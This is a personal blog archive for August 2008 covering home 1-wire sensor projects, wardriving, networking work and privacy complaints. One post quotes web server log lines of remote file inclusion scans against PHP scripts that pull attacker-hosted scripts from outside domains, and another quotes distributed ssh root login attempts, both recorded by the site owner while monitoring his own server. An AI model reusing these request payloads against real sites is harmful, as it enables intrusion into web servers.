News archive August 2008 - Koos van den Hout

Archive by year: 1999 | 2000 | 2001 | 2002 | 2003 | 2004 | 2005 | 2006 | 2007 | 2008 | 2009 | 2010 | 2011 | 2012 | 2013 | 2014 | 2015 | 2016 | 2017 | 2018 | 2019 | 2020

2008-08-31 (#) 11 years ago
I took some time to work on the house 1-wire network today.. and blew up the serial to 1-wire interface in the process. I think there is a voltage difference between house ground (water pipes) and 1-wire ground and I touched a metal part of the 1-wire counter I was going to use for the electricity counting to a water pipe hiding behind another pipe when I was trying to test whether it responded to the led in the electricity meter. So, still no success on measuring electricity and no new house temperature readings either. I did put in an extension of the 1-wire network from the attic to the cupboard beneath the stairs where the electricity meter lives. I used the 'isdn' sockets on the end of the long 1-wire connection so as a side-effect I moved one temperature sensor from the top of the server to the 'wine rack' area and updated the sensors page. It is a different location temperature-wise so I started new statistics for this sensor. I also looked at options for placing a temperature sensor in the living room. The cable to the thermostat is thoroughly cemented in so I can't place a wire alongside that cable. I'll probably use the hole for an extra television-coax cable to get a wire for a temperature sensor from the crawlspace to the living room. I already ordered a replacement serial 1-wire interface. I hope that is the only component that was damaged.

Tags: , ,
2008-08-28 (#) 11 years ago
My favourite ISP, XS4ALL is experimenting with the first IPv6 enabled loadbalancer (xs4all.general thread in Dutch) for their experimental IPv6 website XS4ALL. All 'experimental' and without any warranty that it will be available but a step forward.

Tags: ,
2008-08-26 (#) 11 years ago
Browsing through the web logs looking for any problems shows heaps of IPs trying to find vulnerable php scripts to break into using an approach of constructing lots of urls with the vulnerable script and the right parameters at the end. Sometimes scans from one IP mingling with scans from another IP. Samples:
193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=<a href="=http://www.ganzkoerperpflege.at/files/oye.txt">http://www.ganzkoerperpflege.at/files/oye.txt</a>?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET /~koos/newstag.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:40 +0200] "GET /~koos/newstag.cgi/security//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
74.55.98.10 - - [26/Aug/2008:15:53:50 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=<a href="http://visitingphysicians.com/hrjobs_contacts/r.txt">http://visitingphysicians.com/hrjobs_contacts/r.txt</a>?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.813"
193.142.215.12 - - [26/Aug/2008:21:46:07 +0200] "GET /~koos/error.php?dir=<a href="http://starthost.us/pemlk/dark/safe.txt">http:/www.starthost.us/pemlk/darl/safe.txt</a>?? HTTP/1.1" 404 901 "-" "libwww-perl/5.808"
The one that puzzles me because I see a lot of it and can't find the associated vulnerability:
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/spam/english.php?u=<a href="http://javva.com/id.txt">http://javva.com/id.txt</a>? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 901 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
Not an advertisment for php, this.

Tags: , , ,
2008-08-26 (#) 11 years ago
Op de website van de gemeente Utrecht staat er alleen een webformulier voor het melden van (onder andere) defecte verkeerslichten maar er is een echt verkeerslicht defect telefoonnummer : 030-2864274. En dat is onderweg op de fiets toch handiger dan een webformulier. Tijden geleden genoteerd in mijn gsm toen ik er stickers van zag. Vanmorgen weer eens gebruik van gemaakt toen de verkeerslichteninstallatie op het Eykmanplein in Utrecht compleet uitgevallen was.

Tags: ,
2008-08-24 (#) 11 years ago
Wardriving results 17 - 24 August: 2345 new networks with gps locations. Most of them on a recumbent bicycle tour of Hilversum, a place that is mostly unmapped.

Tags: ,
2008-08-23 (#) 11 years ago
Finally I counted a few light pulses with the one-wire counter. No big circuit with the Velleman MK120R kit but just a photodiode and a resistor hooked up to the counter module. I got the idea from looking at the schematics for the Hobby Boards 1-Wire Lightning Detector. The counting circuit is a phototransistor (in an optocoupler) and a resistor. With a bit of tweaking on the resistor I eventually got the counting circuit to count 2 light flashes from a flashlight. With some more tweaking of the resistor value I think I could count red flashes from the electricity meter.

I also installed the lightning detector under the roof. But it is too close to the wiring of the house I think: sofar all counts are related to me being in the attic and turning on the light. In a 'real' setup I think it needs to be away from the house. Something to keep in mind for the project sundial weather station.


Tags: , , ,
2008-08-22 (#) 11 years ago
Met wat zoekwerk ben ik er uit wat de manier is om meerdere accounts van dezelfde sip server in asterisk te configureren en binnenkomende gesprekken uit elkaar te houden. In mijn geval xs4all, maar het werkt ook met andere aanbieders. Na veel zoeken en proberen de magie gevonden en gelijk opgeschreven Asterisk meerdere sip accounts naar dezelfde sip server

Tags: ,
2008-08-19 (#) 11 years ago
The parts came in but I still can't make the MK120 receiver work as detector for LED light. From looking at the schematics carefully I think the receiver is tuned to the sender. What I want is quite simple: just detect on/off state and convert that to connecting or not connecting +5V and a counter input. Maybe some variant of the Infrared remote control extender circuit can do the work. The LM324 opamp in the Velleman design can be fed with +5V so maybe it is simple to go from a small current (light on a photodiode) to +5V. But this means it is not going to be an 'out of te box' working circuit. Oh well, my electronics knowledge is slowly coming back from way deep...

Tags: ,
2008-08-19 (#) 11 years ago
Opvallend: Wordt Vervolgd komt weer terug (vk.tv). Van 1983 tot 1997 op televisie hoewel ik het vooral volgde in de tijd dat ik op de MAVO zat (de beginjaren met de Tex Avery tekenfilms). De tekenfilms toen vond ik erg leuk, veel amerikaanse invloeden. Ik keek ook regelmatig de tekenfilms op Sky Channel op zaterdagmorgen bij de Fun Factory. Later toen tekenfilms minder humoristisch gooi en smijtwerk kregen en meer 'echt' geweld en fantasy/magie invloeden was mijn interesse in grote hoeveelheden tekenfilms grotendeels over. Ik blijf wel de The Simpsons volgen. Op de Wordt Vervolgd website staat meer informatie over de nieuwe Wordt Vervolgd.

Tags: ,
2008-08-19 (#) 11 years ago
Wardriving results 8 - 16 August (a few days missing because the upload results already scrolled out of the WiGLE upload stats) : 685 new networks with GPS locations.

Tags: ,
2008-08-18 (#) 11 years ago
Recent vroeg ik me af hoe een en ander nu zit met digitale kabeltelevisie en wat de kansen zijn om zelf een digitale videorecorder te bouwen met behulp van mythtv, vdr of freevo. Op digitale kabeltelevisie nederland kwam ik goede uitleg tegen hoe en wat er mogelijk (en onmogelijk) is. Voorlopig heb ik bij de kabelaanbieder in Utrecht (Ziggo) dus geen garantie dat niet door hun geleverde (en gecontroleerde) apparatuur het blijft doen. Maar 'op termijn' zal dit verbeteren.

Tags: ,
2008-08-12 (#) 11 years ago
No local source for a photodiode which is sensitive to visible light. Time to shop on-line for a photodiode which is sensitive to red light, which will be listed as 650 nm, is directional and can deal with the amount of red light from the electricity meter LED. Reading specsheets for photodiodes is also new to me. I found a webpage with lots of explanations about LEDs and calculations. But, ordering a component on-line which costs less than a euro is a bit silly, with probably a lot more costs in shipping and handling. Conrad just charges extra for too small orders.

Tags: , ,
2008-08-10 (#) 11 years ago
I finished soldering the Velleman MK120 receiver I will use for detecting the lightpulses from the electricity meter for the one wire electricity measuring project. I think that is the first soldering of a circuit board since somewhere around my electronics education which finished in 1989 and I did it right! The circuit works as designed: it needs a strong infrared signal to not send out a signal via led and buzzer. I did not solder the buzzer because eventually the signal needs to go into the 1-wire counter and buzzing sounds from the cupboard under the stairs might get irritating fast. After checking whether the circuit board worked as designed I swapped the inputs on the comparator like in the 1-wire electricity monitoring design by Jon00. I did not cut traces and solder wires, I used the IC holder to set up 2 crossed wires to the pins of the IC.
img_6929
In testing I found that the L-53P3C photodiode is very good at receiving infrared, but the red led in our electricity meter does not emit enough infrared light to trigger the circuit. I think I'll need to find a different photodiode which is more sensitive for visible (or just red) light.

Tags: , ,
2008-08-07 (#) 11 years ago
At work we are experimenting with multicast but it stopped working sometime during my holiday. Multicast is quite new for our network management so it was confusing what was wrong. Lots of searching and debugging later we found a fellow Surfnet customer was announcing a rendezvous-point which wasn't going to do the pim rendezvous protocol for us. So we configured the multicast routers to fix on the Surfnet rendezvous point address (145.145.145.145). Surfnet now filters the auto-rp group to avoid problems like these in the future. We learned a lot about multicast debugging in the process.
Just in time: we hope to follow the olympic games in HD quality via multicast streams.

Tags: ,
2008-08-06 (#) 11 years ago
New (for me): a distributed ssh attack. All different IPs trying to log in as root. Which I disable on systems, so it all won't work. From the logs:
Jul 10 02:02:06 idefix sshd[36927]: Failed unknown for illegal user root from 198.105.8.56 port 35529 ssh2
Jul 10 02:21:34 idefix sshd[37295]: Failed unknown for illegal user root from 216.65.214.88 port 52682 ssh2
Jul 10 02:41:58 idefix sshd[37692]: Failed unknown for illegal user root from 67.59.90.96 port 47163 ssh2
Jul 10 03:02:18 idefix sshd[39260]: Failed unknown for illegal user root from 139.29.176.237 port 57930 ssh2
Jul 10 03:22:56 idefix sshd[39933]: Failed unknown for illegal user root from 75.53.25.73 port 48376 ssh2
Seems like a nice distributed attack to circumvent tools that check for repeated attempts from one IP or with a too high rate. But, I still get the logcheck e-mail to point at and laugh, distributed ssh root attempts log. Probably all open proxies or part of some botnet.

Tags: ,
2008-08-05 (#) 11 years ago
Een van mijn e-mail adressen is een adres wat makkelijk bedacht wordt door mensen voor webformulieren. Als gevolg hier van krijg ik regelmatig e-mail van websites die bang zijn dat ze potentiele klanten kwijtraken als ze de ingevoerde e-mail adressen eerst verifieren voor ze hun 'nieuwsbrieven' en dergelijke sturen. Als ik dus in de verkeerde bui ben gaan die mails gelijk door naar het spamklacht.nl klachtenformulier en spamcop.net en als ik in een goeie bui ben probeer ik een keer iets als een 'unsubscribe' link of corrigeer het e-mail adres op de website naar iets als info@afzenderdomain.
Vandaag een bijzondere verdwaalde e-mail:
Geachte mevrouw Slotboom,
Hartelijk dank voor het inzenden van uw pasfoto voor uw OV-chipkaart.
U ontvangt uw nieuwe Voordeelurenabonnement op de OV-chipkaart..
Ik heb alleen zeker geen voordeelurenabonnement meer: juist vanwege de invoering van de OV-chipkaart en het absoluut niet goed nadenken over privacy daarbij heb ik mijn voordeelurenabonnement opgezegd. Maar blijkbaar wil de NS nog eens extra aantonen dat ze slecht nadenken over privacy en accepteert dus elk willekeurig e-mail adres ergens in het invoeren van de gegevens. De 'mijn gegevens' link uit het mailtje geeft ook de gegevens zoals die bij de NS geregistreerd staan, dus ik kan nu van deze mevrouw Slotboom adres, geboortedatum en telefoonnummer zien.
Uit de NS privacy policy waarnaar verwezen wordt op de pagina met gegevens:
Om uw persoonlijke gegevens optimaal te beschermen tegen onbevoegde toegang of onbevoegd gebruik, wordt binnen NS steeds de nieuwste beveiligingstechnologie toegepast.
Nou, blijkbaar is die nieuwste beveiligingstechnologie in dit geval een unieke url via een third-party e-mail response bedrijf die gestuurd wordt aan een e-mail adres waarvan niet geverifieerd is dat het klopt met de persoon waar het over gaat.

Tags: , , ,
2008-08-04 (#) 11 years ago
My 1-wire projects also got their own page. And I ordered the parts for the new project. And a few other bits, including more temperature sensors. So, with some soldering time I'll be monitoring electricity usage soon.

Tags: ,


, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred.

PGP key 5BA9 368B E6F3 34E4 local copy PGP key 5BA9 368B E6F3 34E4 via keyservers pgp key statistics for 0x5BA9368BE6F334E4 Koos van den Hout
RSS
Other webprojects: Camp Wireless, wireless Internet access at campsites, The Virtual Bookcase, book reviews
This page generated by $Id: morenews.cgi,v 1.46 2019/10/20 15:42:02 koos Exp $ in 0.030603 seconds.